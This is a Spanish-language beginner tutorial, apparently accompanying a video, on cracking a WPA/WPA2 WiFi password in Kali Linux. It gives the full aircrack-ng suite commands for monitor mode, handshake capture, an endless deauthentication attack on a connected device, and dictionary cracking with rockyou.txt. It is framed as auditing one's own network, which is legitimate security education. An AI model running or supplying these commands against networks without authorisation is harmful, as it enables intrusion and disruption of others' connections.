Hoy vas a aprender a hackear tu primera red wifi desde el absoluto 0, y no necesitas experiencia previa para hacerlo.
En este vídeo vamos a auditar una red wifi sin necesidad de saber la contraseña, realizar ataques de desautenticación, crackear la contraseña de una red WiFi desconocida y entender de principio a fin cómo funciona el proceso de hacking WiFi cuando comienzas a estudiar.
Este vídeo está diseñado para que cualquiera, sí, cualquiera, pueda seguirlo y hackear su primera red WiFi.
Además, voy a darte un regalo que te ayudará a conseguir tu primer trabajo en ciberseguridad.
Rellena el siguiente formulario y consigue acceso a los recursos mencionados en el vídeo de forma gratuita:
Escribe aquí tu nombre y tu email
Primero debes entender cómo funcionan las conexiones inalámbricas. Las redes WiFi funcionan con ondas de radio y utilizan protocolos de seguridad para cifrar la comunicación. Sin embargo, muchas redes utilizan medidas de seguridad obsoletas y vulnerables que pueden ser explotadas por actores maliciosos.
De forma muy sencilla y resumida, las redes WiFi permiten la conexión de dispositivos a internet sin necesidad de cables, utilizando ondas de radio. Estas señales las gestiona el router, que asigna direcciones IP; que básicamente es un identificador único asignado a un dispositivo conectado a una red.
Los protocolos de seguridad en redes WiFi determinan cómo se cifran y protegen los datos que navegan por la red. Los más comunes son WEP, WPA, WPA2 y WPA3.
La mayoría de redes WiFi, sobre todo las de nuestras casas, utilizan WPA/WPA2.
El cifrado y la autenticación son dos conceptos para garantizar la seguridad de una red WiFi. Los métodos de cifrado más comunes son TKIP, AES y PSK.
Ahora que ya conoces lo básico sobre redes WiFi, vamos a ver qué necesitas para comenzar a auditar una red.
Un adaptador WiFi compatible con modo monitor es un dispositivo de red que permite capturar tráfico inalámbrico sin necesidad de estar conectado a la red. A diferencia de los adaptadores WiFi normales, que solo pueden enviar y recibir datos de una red a la que están asociados, los que soportan modo monitor pueden escuchar todo el tráfico que circula en el aire, incluso si no están conectados a ningún punto de acceso.
En nuestro caso, vamos a necesitar este tipo de adaptador porque vamos a simular un ataque real en la red de nuestra casa.
Yo en mi caso, tengo este adaptador WiFi que permite modo monitor. Abajo en el primer comentario, te dejo el enlace para que puedas adquirirlo.
También necesitamos un sistema operativo para realizar estas pruebas. Yo voy a utilizar Kali Linux. Hay herramientas y otras formas de auditar una red WiFi sin necesidad de utilizar Kali Linux, aún así, este sistema operativo tiene todo lo necesario para realizar auditorías, por lo tanto, es el que yo voy a utilizar para este vídeo.
Si quieres saber cómo instalar Kali Linux de forma rápida, también te dejo por aquí un artículo donde te lo explico.
La metodología que vamos a seguir es la siguiente:
1.Una vez en el PC y con nuestro Kali Linux abierto, vamos a conectar nuestro adaptador WiFi con m modo monitor. En mi caso, lo reconoce al instante sin necesidad de instalar ningún driver.
iwconfig
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up
iwconfig
sudo airmon-ng start wlan0
2. Ahora, con nuestro adaptador en modo monitor, vamos a escanear las redes WiFi para localizar nuestra red WiFi, en este caso, la de mi casa.
sudo airodump-ng wlan0mon
# Recuerda que el nombre de la interfaz debe estar al final
3.Para capturar el handshake, ejecutamos:
sudo airodump-ng -c 1 --bssid 00:00:00:00:00:00 -w capture-file wlan0mon
# sudo para ejecutarlo con privilegios de root
# airodump-ng es la herramienta para captar tráfico en la red
# -c hace referencia al canal en el que está el router en comunicación
# --bssid La dirección MAC del router
# -w El archivo donde se guardará el handshake
# wlan0mon Interfaz de red a utilizar
Ahora, con nuestro teléfono por ejemplo, navegamos por internet y en pantalla veremos el dispositivo y la estación.
Esta ejecución la dejamos activa para que capture paquetes y se guarden en el archivo que hemos indicado con -w
Mientras tanto, vamos a realizar un ataque de desautenticación en el teléfono que esta conectado a la red WiFi. Básicamente, vamos a enviar paquetes al teléfono y este va a conectarse y desconectarse continuamente.
sudo aireplay-ng -0 0 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon
# sudo para ejecutarlo con privilegios de root
# aireplay-ng Herramienta para enviar los paquetes al objetivo
# -0 Selección de paquetes que queremos enviar (0=infinito)
# -a Dirección MAC del router
# -c Dirección STATION del cliente conectado
# wlan0mon Interfaz de red a utilizar
4.Para crackear la contraseña necesitamos un diccionario con contraseñas y el archivo que contiene la contraseña encriptada.
sudo aircrack-ng -w rockyou.txt capture-file-01.cap
# sudo para ejecutarlo con privilegios de root
# aircrack-ng Herramienta para crackear la contraseña
# -w Archivo donde se encuentran las contraseñas que queremos probar
# Nombre del archivo .cap donde se encuentra el handshake capturado
Si has conseguido la contraseña del router, demuestra que tu red no es del todo segura.
La intención de este vídeo es ver que si comprendemos las tácticas que emplean los ciberdelicuentes, podremos proteger mejor nuestras propias redes y contribuir a un entorno mucho más seguro. Recuerda que estos conocimientos deben utilizarse de forma responsable y ética.
Únete a CiberInsider y prepárate para dar el primer paso a conseguir tu empleo en ciberseguridad
Al suscribirte, aceptas la política de privacidad de rinku.tech y recibir noticias, contenidos, comunicaciones relacionados con la web, gratuitos y premium.